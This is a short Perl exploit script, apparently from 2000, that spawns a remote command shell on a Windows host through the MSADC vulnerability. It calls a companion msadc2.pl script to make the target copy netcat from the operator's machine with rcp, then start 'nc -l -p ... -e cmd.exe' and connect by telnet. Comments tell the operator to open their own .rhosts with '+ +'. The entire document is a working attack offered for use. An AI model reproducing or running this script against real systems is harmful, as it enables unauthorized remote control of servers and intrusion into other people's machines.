#!/usr/bin/perl
# -- Spawn a command shell on remote host with MSADC
# -- Shouts to RFP of course, [sSh], computer club,
# -- dust puppy II, irc-servers.com, attrition.org,
# -- and hnn.com
# --
# -- rackmount. good fellaz.

# -- This is more or less a dirty script put together
# -- in 5 minutes.

# -- Add "+ +" to your .rhosts file (yes i know this
# -- will make you vulnerable to certain types of shit)
# -- and put nc.exe (netcat) in your home directory.

if (!($ARGV[0])) { 
  print "spawncmd.pl [remote host] [my _REAL_ ip] [desired port]\n"; 
  exit; 
}

if (!($ARGV[1])) { 
  print "spawncmd.pl $ARGV[0] [my _REAL_ ip] [desired port]\n"; 
  exit; 
}

if (!($ARGV[2])) { 
  print "spawncmd.pl $ARGV[0] $ARGV[1] [desired port]\n"; 
  exit; 
}

open(RHOST, "| ./msadc2.pl -h $ARGV[0]");
print RHOST "rcp -b $ARGV[1].$ENV{'USER'}:$ENV{'HOME'}/nc.exe .\n";
close RHOST;

# -- You may need to increase this depending on the connection
# -- between you and the other host
sleep 5;

open(RHOST, "| ./msadc2.pl -h $ARGV[0]");
print RHOST "nc -l -p $ARGV[2] -e cmd.exe\n";
close RHOST;

# -- After finished connecting you can take "+ +" out of
# -- your .rhosts file.

system("telnet $ARGV[0] $ARGV[2]");

#                    www.hack.co.za              [2000]#
# EOF